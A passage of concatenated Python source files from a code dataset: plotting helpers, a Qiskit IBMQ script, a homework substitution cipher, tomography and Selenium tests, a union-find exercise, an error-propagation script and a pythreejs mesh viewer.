direction='out')\n ax.tick_params(axis='y', direction='out')\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n\n\ndef plot_screen(screen, ax=None):\n \"\"\"Plot a captured screenshot\n\n Parameters\n ----------\n screen : array\n The N x M x 3 (or 4) array of screen pixel values.\n ax : matplotlib Axes | None\n If provided, the axes will be plotted to and cleared of ticks.\n If None, a figure will be created.\n\n Returns\n -------\n ax : matplotlib Axes\n The axes used to plot the image.\n \"\"\"\n screen = np.array(screen)\n if screen.ndim != 3 or screen.shape[2] not in [3, 4]:\n raise ValueError('screen must be a 3D array with 3 or 4 channels')\n if ax is None:\n plt.figure()\n ax = plt.axes([0, 0, 1, 1])\n ax.imshow(screen)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.box('off')\n return ax\n","sub_path":"expyfun/analyze/_viz.py","file_name":"_viz.py","file_ext":"py","file_size_in_byte":15942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"279298270","text":"print('Loading dependencies .. ', end='', flush=True)\nfrom qiskit import IBMQ, QuantumCircuit, execute, assemble, transpile\nfrom dotenv import load_dotenv\nimport matplotlib\nimport os\nprint('done')\n\nSAVEDIR = 'plots/'\nCIRCUIT_FILENAME = 'circuit.png'\n\ndef load_api_token():\n load_dotenv()\n API_TOKEN = os.getenv('API_TOKEN')\n IBMQ.save_account(API_TOKEN)\n\ndef run_on_ibmq(draw=False, waitForResult=False, backend='ibmq_burlington'):\n print('Loading account .. ', end='', flush=True)\n provider = IBMQ.load_account()\n print('done')\n backend = getattr(provider.backends, backend)\n circuit = define_circuit(draw)\n\n print('Transpiling .. ', end='')\n transpiled = transpile(circuit, backend)\n print('done')\n print('Assembling .. ', end='')\n qobj = assemble(transpiled, backend, shots=1000)\n print('done')\n exit()\n print(f'Sending to {backend} .. ', end='')\n job = backend.run(qobj)\n print('done')\n if waitForResult:\n print(f'Waiting for result .. ', end='', flush=True)\n delayed_result = backend.retrieve_job(job.job_id()).result()\n delayed_counts = delayed_result.get_counts()\n print('done')\n print(f'\\nTotal counts: {delayed_counts}')\n else:\n print(f'\\nJob ID: {job.job_id()}')\n\ndef define_circuit(draw):\n print('Creating circuit .. ', end='')\n circuit = QuantumCircuit(2, 2)\n # Add a H gate on qubit 0\n circuit.h(0)\n # Add a CX (CNOT) gate on control qubit 0 and target qubit 1\n circuit.cx(0, 1)\n # Map the quantum measurement to the classical bits\n circuit.measure([0,1], [0,1])\n print('done\\n')\n\n if draw:\n print('Circuit:')\n print(circuit.draw('text'))\n circuit.draw('mpl')\n print(f'Saving circuit to {CIRCUIT_FILENAME} .. 
', end='')\n if not os.path.exists(SAVEDIR):\n os.mkdir(SAVEDIR)\n\n matplotlib.pyplot.savefig('plots/circuit.png')\n print('done\\n')\n return circuit\n\nif __name__ == '__main__':\n # load_api_token()\n run_on_ibmq(draw=True, waitForResult=True, backend='ibmq_london')\n","sub_path":"HW2/test_ibmq.py","file_name":"test_ibmq.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"649442734","text":"class SingletonClass:\n\n __instance = None\n def __new__(cls):\n if not cls.__instance:\n cls.__instance = object.__new__(cls)\n return cls.__instance\n\ninstance1 = SingletonClass()\ninstance2 = SingletonClass()\n\nprint(id(instance1), id(instance2), instance1 is instance2)","sub_path":"implements/python/01_creational_patterns/singleton_pattern_1.py","file_name":"singleton_pattern_1.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"10654759","text":"\n'''Dato un testo da codificare ed una chiave si propone il seguente schema crittografico:\n\n- dalla chiave vengono eliminati tutti i caratteri C per cui C<'a' o C>'z'. \n- di ciascuno dei caratteri restanti vengono cancellate dalla chiave tutte le occorrenze \n tranne l'ultima, ottenendo una sequenza DISORDINATA. \n- i caratteri presenti nella stringa cosi' ripulita saranno i soli caratteri del testo \n ad essere codificati ovvero sostituiti nel testo crittografato (gli altri resteranno invariati). \n- la sequenza ORDINATA dei caratteri rimasti nella chiave viene messa in corrispondenza \n con la sequenza DISORDINATA dei caratteri ottenuti al passo precedente.\n\nCome esempio di applicazione consideriamo la chiave\n \"sim sala Bim!\"\na seguito delle eliminazioni la chiave produce la sequenza DISORDINATA\n \"slaim\"\n \nI soli caratteri del testo a subire una codifica sarano 's','l', 'a' 'i' ed 'm'. 
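\n\n(A compact Python sketch of the key preparation just described -- illustrative only, not the exercise's reference solution:\n\n def build_mapping(key):\n clean = [c for c in key if 'a' <= c <= 'z']\n disordered = []\n for c in reversed(clean): # keep only the LAST occurrence\n if c not in disordered:\n disordered.append(c)\n disordered.reverse()\n ordered = sorted(disordered)\n return dict(zip(ordered, disordered))\n\nbuild_mapping(\"sim sala Bim!\") yields exactly the pairs (a,s), (i,l), (l,a), (m,i), (s,m) used above.)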
\nPer sapere con cosa verranno codificati questi caratteri si considera la seguente corrispondenza\ntra sequenze: sort!\n \"ailms\" (sequenza ordinata degli stessi caratteri)\n \"slaim\" (sequenza disordinata ottenuta dalla chiave)\nquesto determina gli accoppiamenti (a,s), (i,l) (l,a), (m,i) ed (s,m)\nla 'a' dunque sara' codificata con 's', la 'i' con 'l' e cosi' via.\n\nUtilizzando la chiave \"sim sala Bim!\" per codificare il testo \"il mare sa di sale\" si \n otterra' il seguente testo crittografato:\n \"il mare sa di sale\" (testo in chiaro)\n \"la isre ms dl msae\" (testo crittografato)\n\nLa decodifica del testo crittografato opera sulla stessa chive ma sostituisce le lettere\npresenti nella sequenza disordinata con quelle della sequenza ordinata.\nQuindi nell'esempio precedente le sostituzioni sono invertite:\n (s, a), (l, i) (a, l), (i, m) ed (m, s)\n\nPer altri esempi vedere il file grade03.txt\n\nImplementate le due funzioni\n codifica(chiave, testo_in_chiaro) -> testo_crittografato\n decodifica(chiave, testo_crittografato) -> testo_in_chiaro\n\nATTENZIONE: NON USATE LETTERE ACCENTATE.\nATTENZIONE: Se il grader non termina entro 30 secondi il punteggio dell'esercizio e' zero.\n'''\ndisordinata = []\nordinata = []\n\ndef codifica(chiave, testo):\n '''inserire qui la vostra implementazione'''\n global disordinata\n global ordinata\n \n disordinata = []\n ordinata = []\n \n temp = []\n for char in chiave: # pulire la stringa dai caratteri non permissibili [A-Z] U {caratteri speciali}\n if not(ord(char) < ord('a') or ord(char) > ord('z')):\n temp.append(char)\n \n for c in reversed(temp):\n if not c in disordinata:\n disordinata.append(c)\n \n disordinata = disordinata[::-1] # qui si trova la sequenza disordinata dei caratteri da codificare nel plaintext\n \n ordinata = disordinata.copy()\n ordinata.sort() # qui si trova la lista ordinata dei caratteri\n \n cyphertext = []\n for char in testo:\n if not char in ordinata:\n cyphertext.append(char)\n else:\n indice_char = ordinata.index(char)\n cyphertext.append(disordinata[indice_char])\n \n testo_crittografato = ''.join(cyphertext)\n return testo_crittografato\n \n\ndef decodifica(chiave, testo):\n '''inserire qui la vostra implementazione'''\n global disordinata\n global ordinata\n \n plaintext = []\n for char in testo:\n if not char in disordinata:\n plaintext.append(char)\n else:\n indice_char = disordinata.index(char)\n plaintext.append(ordinata[indice_char])\n\n testo_in_chiaro = ''.join(plaintext) \n return testo_in_chiaro\n \n","sub_path":"students/1802430/homework01/program03.py","file_name":"program03.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"400007557","text":"import tomopy\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pyqtgraph as pg\nfrom tomoCam import gpuGridrec\n\nnum_slice = 50\nim_size = 512 #2560 #A n X n X n volume\nsino_center = im_size/2#1280\nnum_angles = 512 #1024\ngpu_device = 2\noversamp_factor=1.5\nnum_iter = 150\np=1.2\nsigma=.1\n\n\n\nobj = tomopy.shepp3d((num_slice,im_size,im_size)) # Generate an object.\ntheta = tomopy.angles(num_angles) # Generate uniformly spaced tilt angles.\npg.image(obj);pg.QtGui.QApplication.exec_()\n### Comparing to tomopy \ntomo = tomopy.project(obj,theta)\nproj_dim = tomo.shape[2]\ntomo= tomo[:,:,proj_dim/2-im_size/2:proj_dim/2+im_size/2]\npg.image(tomo);pg.QtGui.QApplication.exec_()\n################## GPU MBIR 
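######################\n# Aside: each pg.image(...) view in this script only renders once the Qt\n# event loop runs -- pg.QtGui.QApplication.exec_() blocks until the window\n# is closed. A tiny helper (a sketch, not part of tomoCam) keeps that\n# pattern in one place:\n#\n# def show_volume(vol):\n# pg.image(vol)\n# pg.QtGui.QApplication.exec_()\n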
######################\ninput_params={}\ninput_params['gpu_device']=gpu_device\ninput_params['oversamp_factor']=oversamp_factor\ninput_params['num_iter']=num_iter\ninput_params['fbp_filter_param']=0.5\nt=time.time()\nrec_gridrec = gpuGridrec(tomo,theta,sino_center,input_params)\nelapsed_time = (time.time()-t)\nprint('Time for reconstucting using GPU-Gridrec of %d slices: %f' % (num_slice,elapsed_time))\npg.image(rec_gridrec/(num_angles*im_size));pg.QtGui.QApplication.exec_()\n","sub_path":"python_2D/test_Gridrec.py","file_name":"test_Gridrec.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"618144880","text":"def int_lst_input():\n return [int(val) for val in input().split(' ')]\n\ndef int_input():\n return int(input())\n\ndef print_lst(lst):\n print(' '.join([str(val) for val in lst]))\n\ndef solve():\n q = int_input()\n for i in range(q):\n n = int_input()\n\n seen = set()\n\n count = 0\n\n while n > 0 and n not in seen:\n seen.add(n)\n\n if n % 5 == 0:\n n = 4 * n // 5\n elif n % 3 == 0:\n n = 2 * n // 3\n elif n % 2 == 0:\n n = n // 2\n else:\n break\n\n count += 1\n\n if n == 1:\n print(count)\n else:\n print(-1)\n\nif __name__ == '__main__':\n solve()\n","sub_path":"1176A_divide_it.py","file_name":"1176A_divide_it.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"463207750","text":"def MakeSet(i, parent):\n parent[i] = i\n\ndef Find(i, parent):\n while i != parent[i]:\n i = parent[i]\n return i\n\ndef Merge(i, j, parent, rank):\n i_id, j_id = Find(i, parent), Find(j, parent)\n if i_id == j_id:\n return\n if rank[i_id] > rank[j_id]:\n parent[j_id] = i_id\n rank[i_id] += rank[j_id]\n else:\n parent[i_id] = j_id\n rank[j_id] += rank[i_id]\n\n\n\nn, m = map(int, input().split())\nrank = list(map(int, input().split()))\narray = [i for i in range(0, n)]\nfor i in range(0, n):\n MakeSet(i, array)\nfor _ in range(m):\n i, j = map(int, input().split())\n print(array)\n Merge(i - 1, j - 1, array, rank)\n #print(i, j)\n print(rank[Find(j, parent=array)])\n #print(rank)","sub_path":"Week2/merging_tables/training_with_sets.py","file_name":"training_with_sets.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"75633949","text":"# made with heart by Gregor Zunic\n\nfrom sympy import *\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom decimal import Decimal\n\n'''\nizracun nagotovsti v enacbah\n\ntreba je installat:\n\npip install sympy, numpy, matplotlib\n\nkt v Projekt Tomo se spreminja samo stvari k so med ## ##\n'''\n\n####################################################################\n####################################################################\n\n# to je samo vizualno da se vid kaj se za rezultat dubi\nracunamo = 'k'\n\n# stevilo racunskih mest pri koncnem rezultatu (output)\nnatancnost_mest = 3\n\n# vazn samo za koncn output, za velikost texta\ntext_size = 20\n\n# za vsak simbol k se ga uporab v enacbi (function) je treba narest symbol (lahko je z latex formatingom, samo more bit r'')\nro, d1, d2 = symbols(r'\\rho d_1 d_2')\n\n# za vsako neznanko nrdimo tuple, (x, []) prvi el v listu je velikost neznanke, drugi el je napaka\ndata = [\n (ro, [13000, 0]),\n (d1, [0.006, 0.00001]),\n (d2, [0.0128, 0.1*10**-6])\n]\n\n# tuki se definira funkcijo, lahko se uporabla use 
funkcije eg. sin(), ln() iz numpy-ja in sympy-ja\nfunction = ro*(1/(pi*d2**2)**2-1/(pi*d1**2)**2)/2\n\n####################################################################\n####################################################################\n\n# ne spreminjat, mislm lah ampak se lah kej breaka\n\n\ndef format_text(num):\n return str(f'%.{natancnost_mest}E' % num).replace('+', '')\n\n\nvalues = [(x[0], x[1][0]) for x in data]\n\nresults = []\nformated_results = []\n\nfor el in data:\n deriv = Derivative(function, el[0])\n res = deriv.doit()\n deltaa = el[1][1]\n error = (float(deriv.doit().subs(values) * deltaa))\n latfunc = '$'+latex(res)+'$'\n results.append((latfunc, deltaa, error))\n formated_results.append((latfunc, deltaa, format_text(error)))\n\n\nvrednost_f = float(function.doit().subs(values))\n\nfinal_error = sqrt(sum([abs(float(x[2])**2) for x in results]))\n\nif not text_size:\n text_size = 15\n\ncolumns = [r'$\\frac{\\partial %s}{\\partial x_i}$' % racunamo,\n r'$\\sigma_i$', r'$\\sigma_i \\cdot \\frac{\\partial %s}{\\partial x_i}$' % racunamo]\nrows = ['$'+str(x[0])+'$' for x in data]\n\nplt.title('Negotovost za funkcijo')\n\nplt.xticks([])\nplt.yticks([])\n\nplt.subplots_adjust(left=0.03, bottom=0, right=0.97, top=0.94)\n\nplt.axis('off')\n\ntable = plt.table(cellText=formated_results, loc='center left',\n rowLabels=rows, colLabels=columns)\n\nplt.text(0.35, 0.9, '$'+racunamo+'=' +\n latex(function)+'$', fontsize=text_size+5)\ntable.set_fontsize(text_size)\ntable.scale(1, 3)\ntable.auto_set_font_size(False)\n\n\nlatex_vrednost = format_text(vrednost_f)\nlatex_error = format_text(final_error)\n\nprint(latex_vrednost, '+-', latex_error)\n\nplt.text(0.02, 0.1, r'$'+racunamo+' = ' + latex_vrednost + ' \\pm ' +\n latex_error + '$', fontsize=text_size+4)\n\n\nplt.show()\n","sub_path":"fizikalni_praktikum/tabela_negotovosti.py","file_name":"tabela_negotovosti.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"97129060","text":"import sys\nimport unittest\nfrom selenium import webdriver\n\n\nclass SearchProducts(unittest.TestCase):\n PLATFORM = 'LINUX'\n BROWSER = 'chrome'\n SAUCE_USERNAME = 'torch_v'\n SAUCE_KEY = 'a0027258-2d07-409d-821e-0891129550ef'\n\n def setUp(self):\n desired_caps = {'platform': self.PLATFORM, 'browserName': self.BROWSER}\n sauce_string = self.SAUCE_USERNAME + ':' + self.SAUCE_KEY\n\n self.driver = webdriver.\\\n Remote('http://' + sauce_string +\n '@ondemand.saucelabs.com:80/wd/hub', desired_caps)\n self.driver.implicitly_wait(10)\n self.driver.maximize_window()\n self.driver.get('http://demo-store.seleniumacademy.com/')\n\n def test_search_by_category(self):\n # get the search textbox\n self.search_filed = self.driver.find_element_by_name('q')\n self.search_filed.click()\n\n # enter search keyword and submit\n self.search_filed.send_keys('phones')\n self.search_filed.submit()\n\n # get all the anchor elements which have prouct names displayed\n # currently on result page using find_elements_by_xpath method\n products = self.driver.\\\n find_elements_by_xpath('//h2[@class=\\'product-name\\']/a')\n\n # check count of products shown in results\n self.assertEqual(3, len(products))\n\n def tearDown(self):\n self.driver.quit()\n\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n SearchProducts.BROWSER = sys.argv.pop()\n SearchProducts.PLATFORM = sys.argv.pop()\n 
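# The two pop() calls read the CLI arguments back to front ('chrome' is\n # popped first into BROWSER, then 'LINUX' into PLATFORM for an invocation\n # like `python sauce_test.py LINUX chrome`) and, importantly, remove them\n # from sys.argv so unittest.main() below does not mistake them for test\n # names.\n 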
unittest.main(verbosity=2)\n","sub_path":"chapter_6/sauce_test.py","file_name":"sauce_test.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"266503490","text":"import numpy as np\nimport ipywidgets as widgets\nfrom ipywidgets import HTML, Text, Output, VBox, HBox, interact\nfrom pythreejs import *\nfrom IPython.display import display\nimport matplotlib.pyplot as plt\n\n# Helper functions\ndef get_colors(inp, colormap=\"viridis\", normalize=True, vmin=None, vmax=None):\n colormap = plt.cm.get_cmap(colormap)\n if normalize:\n vmin=np.min(inp)\n vmax=np.max(inp)\n\n norm = plt.Normalize(vmin, vmax)\n return colormap(norm(inp))[:, :3]\n\ndef gen_checkers(n_checkers_x, n_checkers_y, width=256, height=256): \n # tex dims need to be power of two.\n array = np.ones((width, height, 3), dtype='float32')\n\n # width in texels of each checker\n checker_w = width / n_checkers_x\n checker_h = height / n_checkers_y\n\n for y in range(height):\n for x in range(width):\n color_key = int(x / checker_w) + int(y / checker_h)\n if color_key % 2 == 0:\n array[x, y, :] = [ 1., 0.874, 0.0 ]\n else:\n array[x, y, :] = [ 0., 0., 0. ]\n return array\n\nclass Viewer():\n def __init__(self, settings):\n self.__update_settings(settings)\n self._light = DirectionalLight(color='white', position=[0, 0, 1], intensity=0.6)\n self._light2 = AmbientLight(intensity=0.5)\n self._cam = PerspectiveCamera(position=[0, 0, 1], lookAt=[0, 0, 0], fov=self.__s[\"fov\"], \n aspect=self.__s[\"width\"]/self.__s[\"height\"], children=[self._light])\n self._orbit = OrbitControls(controlling=self._cam)\n self._scene = Scene(children=[self._cam, self._light2], background=self.__s[\"background\"])#\"#4c4c80\"\n self._renderer = Renderer(camera=self._cam, scene = self._scene, controls=[self._orbit], \n width=self.__s[\"width\"], height=self.__s[\"height\"], antialias=self.__s[\"antialias\"])\n\n self.__widgets = []\n self.__objects = {}\n self.__cnt = 0\n \n def __get_shading(self, shading):\n shad = {\"flat\":True, \"wireframe\":True, \"wire_width\": 0.03, \"wire_color\": \"black\",\n \"side\": 'DoubleSide', \"colormap\": \"viridis\", \"normalize\": [None, None],\n \"bbox\": False, \"roughness\": 0.5, \"metalness\": 0.25, \"reflectivity\": 1.0, \n \"line_width\": 1.0, \"line_color\": \"black\", \"point_color\": \"red\", \"point_size\": 0.01, \n \"text_color\" : \"red\"\n }\n for k in shading:\n shad[k] = shading[k]\n return shad\n \n def __update_settings(self, settings={}):\n sett = {\"width\": 600, \"height\": 600, \"antialias\": True, \"scale\": 1.5, \"background\": \"#ffffff\", \n \"fov\": 30}\n for k in settings:\n sett[k] = settings[k]\n self.__s = sett\n \n def __add_object(self, obj, parent=None):\n if not parent: # Object is added to global scene and objects dict\n self.__objects[self.__cnt] = obj\n self.__cnt += 1\n self._scene.add(obj[\"mesh\"])\n else: # Object is added to parent object and NOT to objects dict\n parent.add(obj[\"mesh\"])\n \n self.__update_view()\n return self.__cnt - 1\n \n \n def __add_line_geometry(self, lines, shading, obj=None):\n lines = lines.astype(\"float32\", copy=False)\n mi = np.min(lines, axis=0)\n ma = np.max(lines, axis=0)\n geometry = BufferGeometry(attributes={'position': BufferAttribute(lines, normalized=False)})\n material = LineBasicMaterial(linewidth=shading[\"line_width\"], color=shading[\"line_color\"])\n #, vertexColors='VertexColors'), \n lines = LineSegments(geometry=geometry, 
material=material) #type='LinePieces')\n line_obj = {\"geometry\": geometry, \"mesh\": lines, \"material\": material, \n \"max\": ma, \"min\": mi, \"type\": \"Lines\", \"wireframe\": None}\n \n if obj:\n return self.__add_object(line_obj, obj), line_obj\n else:\n return self.__add_object(line_obj)\n \n def __update_view(self):\n if len(self.__objects) == 0:\n return\n ma = np.zeros((len(self.__objects), 3))\n mi = np.zeros((len(self.__objects), 3))\n for r, obj in enumerate(self.__objects):\n ma[r] = self.__objects[obj][\"max\"]\n mi[r] = self.__objects[obj][\"min\"]\n ma = np.max(ma, axis=0)\n mi = np.min(mi, axis=0)\n diag = np.linalg.norm(ma-mi)\n mean = ((ma - mi) / 2 + mi).tolist()\n scale = self.__s[\"scale\"] * (diag)\n self._orbit.target = mean\n self._cam.lookAt(mean)\n self._cam.position = [mean[0], mean[1], mean[2]+scale]\n self._light.position = [mean[0], mean[1], mean[2]+scale]\n\n self._orbit.exec_three_obj_method('update')\n self._cam.exec_three_obj_method('updateProjectionMatrix')\n \n def __get_bbox(self, v):\n m = np.min(v, axis=0)\n M = np.max(v, axis=0)\n\n # Corners of the bounding box\n v_box = np.array([[m[0], m[1], m[2]], [M[0], m[1], m[2]], [M[0], M[1], m[2]], [m[0], M[1], m[2]],\n [m[0], m[1], M[2]], [M[0], m[1], M[2]], [M[0], M[1], M[2]], [m[0], M[1], M[2]]])\n\n f_box = np.array([[0, 1], [1, 2], [2, 3], [3, 0], [4, 5], [5, 6], [6, 7], [7, 4],\n [0, 4], [1, 5], [2, 6], [7, 3]], dtype=np.uint16)\n return v_box, f_box\n\n def __get_colors(self, v, f, c, sh):\n coloring = \"VertexColors\"\n if type(c) == type(None): # No color\n colors = np.ones_like(v)\n colors[:, 1] = 0.874\n colors[:, 2] = 0.0\n #print(\"No color\")\n elif type(c) == np.ndarray and c.size == 3: # Single color\n colors = np.ones_like(v)\n colors[:, 0] = c[0]\n colors[:, 1] = c[1]\n colors[:, 2] = c[2]\n #print(\"Single colors\")\n elif type(c) == np.ndarray and len(c.shape) == 2 and c.shape[1] == 3: # Color values for\n if c.shape[0] == f.shape[0]: # faces\n colors = np.hstack([c, c, c]).reshape((-1, 3))\n coloring = \"FaceColors\"\n #print(\"Face color values\")\n if c.shape[0] == v.shape[0]: # vertices\n colors = c \n #print(\"Vertex color values\")\n elif type(c) == np.ndarray and c.size == f.shape[0]: # Function values for faces\n normalize = sh[\"normalize\"][0] != None and sh[\"normalize\"][1] != None\n cc = get_colors(c, sh[\"colormap\"], normalize=normalize, \n vmin=sh[\"normalize\"][0], vmax=sh[\"normalize\"][1])\n #print(cc.shape)\n colors = np.hstack([cc, cc, cc]).reshape((-1, 3))\n coloring = \"FaceColors\"\n #print(\"Face function values\")\n elif type(c) == np.ndarray and c.size == v.shape[0]: # Function values for vertices\n normalize = sh[\"normalize\"][0] != None and sh[\"normalize\"][1] != None\n colors = get_colors(c, sh[\"colormap\"], normalize=normalize, \n vmin=sh[\"normalize\"][0], vmax=sh[\"normalize\"][1])\n #print(\"Vertex function values\")\n else:\n print(\"Invalid color array given! 
Supported are numpy arrays.\", type(c))\n\n return colors, coloring\n \n def add_mesh(self, v, f, c=None, uv=None, shading={}):\n sh = self.__get_shading(shading)\n mesh_obj = {}\n \n # Type adjustment vertices\n v = v.astype(\"float32\", copy=False)\n \n # Color setup \n colors, coloring = self.__get_colors(v, f, c, sh)\n \n # Type adjustment faces and colors\n c = colors.astype(\"float32\", copy=False)\n \n # Material and geometry setup\n ba_dict = {\"color\": BufferAttribute(c)}\n if coloring == \"FaceColors\":\n verts = np.zeros((f.shape[0]*3, 3), dtype=\"float32\")\n for ii in range(f.shape[0]):\n #print(ii*3, f[ii])\n verts[ii*3] = v[f[ii,0]]\n verts[ii*3+1] = v[f[ii,1]]\n verts[ii*3+2] = v[f[ii,2]]\n v = verts\n else:\n f = f.astype(\"uint16\", copy=False).ravel()\n ba_dict[\"index\"] = BufferAttribute(f, normalized=False)\n \n ba_dict[\"position\"] = BufferAttribute(v, normalized=False)\n \n if type(uv) != type(None):\n uv = (uv - np.min(uv)) / (np.max(uv) - np.min(uv))\n tex = DataTexture(data=gen_checkers(20, 20), format=\"RGBFormat\", type=\"FloatType\")\n material = MeshStandardMaterial(map=tex, reflectivity=sh[\"reflectivity\"], side=sh[\"side\"], \n roughness=sh[\"roughness\"], metalness=sh[\"metalness\"], flatShading=sh[\"flat\"],\n polygonOffset=True, polygonOffsetFactor= 1, polygonOffsetUnits=5)\n ba_dict[\"uv\"] = BufferAttribute(uv.astype(\"float32\", copy=False))\n else:\n material = MeshStandardMaterial(vertexColors=coloring, reflectivity=sh[\"reflectivity\"], \n side=sh[\"side\"], roughness=sh[\"roughness\"], metalness=sh[\"metalness\"], \n flatShading=sh[\"flat\"], \n polygonOffset=True, polygonOffsetFactor= 1, polygonOffsetUnits=5)\n\n geometry = BufferGeometry(attributes=ba_dict)\n \n if coloring == \"VertexColors\":\n geometry.exec_three_obj_method('computeVertexNormals')\n else:\n geometry.exec_three_obj_method('computeFaceNormals')\n \n # Mesh setup\n mesh = Mesh(geometry=geometry, material=material)\n \n # Wireframe setup\n mesh_obj[\"wireframe\"] = None\n if sh[\"wireframe\"]:\n wf_geometry = WireframeGeometry(mesh.geometry) # WireframeGeometry\n wf_material = LineBasicMaterial(color=sh[\"wire_color\"], linewidth=sh[\"wire_width\"])\n wireframe = LineSegments(wf_geometry, wf_material)\n mesh.add(wireframe)\n mesh_obj[\"wireframe\"] = wireframe\n \n # Bounding box setup\n if sh[\"bbox\"]:\n v_box, f_box = self.__get_bbox(v)\n _, bbox = self.add_edges(v_box, f_box, sh, mesh)\n mesh_obj[\"bbox\"] = [bbox, v_box, f_box]\n \n # Object setup\n mesh_obj[\"max\"] = np.max(v, axis=0)\n mesh_obj[\"min\"] = np.min(v, axis=0)\n mesh_obj[\"geometry\"] = geometry\n mesh_obj[\"mesh\"] = mesh\n mesh_obj[\"material\"] = material\n mesh_obj[\"type\"] = \"Mesh\"\n mesh_obj[\"shading\"] = sh\n mesh_obj[\"coloring\"] = coloring\n mesh_obj[\"arrays\"] = [v, f, c] # TODO replays with proper storage or remove if not needed\n \n return self.__add_object(mesh_obj) \n\n \n def add_lines(self, beginning, ending, shading={}, obj=None):\n sh = self.__get_shading(shading)\n lines = np.hstack([beginning, ending])\n lines = lines.reshape((-1, 3))\n return self.__add_line_geometry(lines, sh, obj)\n \n def add_edges(self, vertices, edges, shading={}, obj=None):\n sh = self.__get_shading(shading)\n lines = np.zeros((edges.size, 3))\n cnt = 0\n for e in edges:\n lines[cnt, :] = vertices[e[0]]\n lines[cnt+1, :] = vertices[e[1]]\n cnt += 2\n return self.__add_line_geometry(lines, sh, obj) \n\n def add_points(self, points, shading={}, obj=None):\n sh = self.__get_shading(shading)\n points = 
points.astype(\"float32\", copy=False)\n mi = np.min(points, axis=0)\n ma = np.max(points, axis=0)\n geometry = BufferGeometry(attributes={\"position\": BufferAttribute(points, normalized=False)})\n material = PointsMaterial(color=sh[\"point_color\"], size=sh[\"point_size\"])\n points = Points(geometry=geometry, material=material)\n point_obj = {\"geometry\": geometry, \"mesh\": points, \"material\": material, \n \"max\": ma, \"min\": mi, \"type\": \"Points\", \"wireframe\": None}\n \n if obj:\n return self.__add_object(point_obj, obj), point_obj\n else:\n return self.__add_object(point_obj)\n\n def remove_object(self, obj_id):\n if obj_id not in self.__objects:\n print(\"Invalid object id. Valid ids are: \", list(self.__objects.keys()))\n return\n self._scene.remove(self.__objects[obj_id][\"mesh\"])\n del self.__objects[obj_id]\n self.__update_view()\n \n def reset(self):\n for obj_id in list(self.__objects.keys()).copy():\n self._scene.remove(self.__objects[obj_id][\"mesh\"])\n del self.__objects[obj_id]\n self.__update_view()\n\n def update_object(self, oid=0, vertices=None, colors=None, faces=None):\n obj = self.__objects[oid]\n if type(vertices) != type(None):\n v = vertices.astype(\"float32\", copy=False)\n obj[\"geometry\"].attributes[\"position\"].array = v\n #self.wireframe.attributes[\"position\"].array = v # Wireframe updates?\n obj[\"geometry\"].attributes[\"position\"].needsUpdate = True\n obj[\"geometry\"].exec_three_obj_method('computeVertexNormals')\n if type(colors) != type(None):\n colors, coloring = self.__get_colors(obj[\"arrays\"][0], obj[\"arrays\"][1], colors, obj[\"shading\"])\n colors = colors.astype(\"float32\", copy=False)\n obj[\"geometry\"].attributes[\"color\"].array = colors\n obj[\"geometry\"].attributes[\"color\"].needsUpdate = True\n if type(faces) != type(None):\n if obj[\"coloring\"] == \"FaceColors\":\n print(\"Face updates are currently only possible in vertex color mode.\")\n return\n f = faces.astype(\"uint16\", copy=False).ravel()\n print(obj[\"geometry\"].attributes)\n obj[\"geometry\"].attributes[\"index\"].array = f\n #self.wireframe.attributes[\"position\"].array = v # Wireframe updates?\n obj[\"geometry\"].attributes[\"index\"].needsUpdate = True\n obj[\"geometry\"].exec_three_obj_method('computeVertexNormals')\n #self.mesh.geometry.verticesNeedUpdate = True\n #self.mesh.geometry.elementsNeedUpdate = True\n #self.update()\n \n def update(self):\n self.mesh.exec_three_obj_method('update')\n self.orbit.exec_three_obj_method('update')\n self.cam.exec_three_obj_method('updateProjectionMatrix')\n self.scene.exec_three_obj_method('update')\n\n \n def add_text(self, text, shading={}):\n self.update_shading(shading)\n tt = TextTexture(string=text, color=self.s[\"text_color\"])\n sm = SpriteMaterial(map=tt)\n self.text = Sprite(material=sm, scaleToTexture=True) \n self.scene.add(self.text)\n \n #def add_widget(self, widget, callback):\n # self.widgets.append(widget)\n # widget.observe(callback, names='value')\n\n def add_dropdown(self, options, default, desc, cb):\n widget = widgets.Dropdown(options=options, value=default, description=desc)\n self.widgets.append(widget)\n widget.observe(cb, names=\"value\")\n display(widget)\n \n def add_button(self, text, cb):\n button = widgets.Button(description=text)\n self.widgets.append(button)\n button.on_click(cb)\n display(button)\n\n def launch(self):\n display(self._renderer)\n for w in self.__widgets:\n display(w)\n\ndef plot(v, f, c=None, uv=None, shading={}, plot=None, return_plot=False):#, 
